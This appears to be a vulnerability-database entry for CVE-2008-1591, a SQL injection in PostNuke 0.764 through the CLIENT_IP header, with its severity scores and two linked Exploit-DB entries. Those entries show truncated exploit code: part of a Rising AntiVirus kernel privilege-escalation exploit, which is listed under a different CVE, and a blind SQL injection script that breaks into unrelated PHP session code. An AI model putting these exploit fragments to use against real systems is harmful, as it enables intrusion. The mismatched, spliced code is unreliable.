CVE-2008-1591
Published 2008-03-31
Priority: P3, 39, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.3th percentile)
The pnVarPrepForStore function in PostNuke 0.764 and earlier skips input sanitization when magic_quotes_runtime is enabled, which allows remote attackers to conduct SQL injection attacks and execute arbitrary SQL commands via input associated with server variables, as demonstrated by the CLIENT_IP HTTP header (HTTP_CLIENT_IP variable).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| postnuke | postnuke | <= 0.764 | — |
No detection rules found.
Exploit-DB
Rising AntiVirus 2008/2009/2010 - Local Privilege Escalation
exploitdb·2010-01-28
CVE-2010-1591 Rising AntiVirus 2008/2009/2010 - Local Privilege Escalation
---
```cpp
//by Dlrow [email protected]
//restore all ssdt hooks
// Rising0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"

enum { SystemModuleInformation = 11 };

typedef struct {
    ULONG Unknown1;
    ULONG Unknown2;
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0 ;

void __stdcall WriteKVM(PVOID Address , ULONG Value)
{
    ULONG ColorValue = Value ;
    ULONG btr ;
    ULONG ColorBuffer =
```
Exploit-DB
PostNuke 0.764 - Blind SQL Injection
exploitdb·2008-03-21
CVE-2008-1591 PostNuke 0.764 - Blind SQL Injection
---
```
#!/usr/bin/python
#=================================================================================================#
# This was a priv8 Exploit #
#=================================================================================================#
# Postnuke $v) {
        if (substr($k,0,4) == 'PNSV') {
            return false;
        }
    }
    // Kick it
    session_start();
    // Have to re-write the cache control header to remove no-save, this
    // allows downloading of files to disk for application handlers
    // adam_baum - no-cache was stopping modules (andro
```
No writeups or analysis indexed.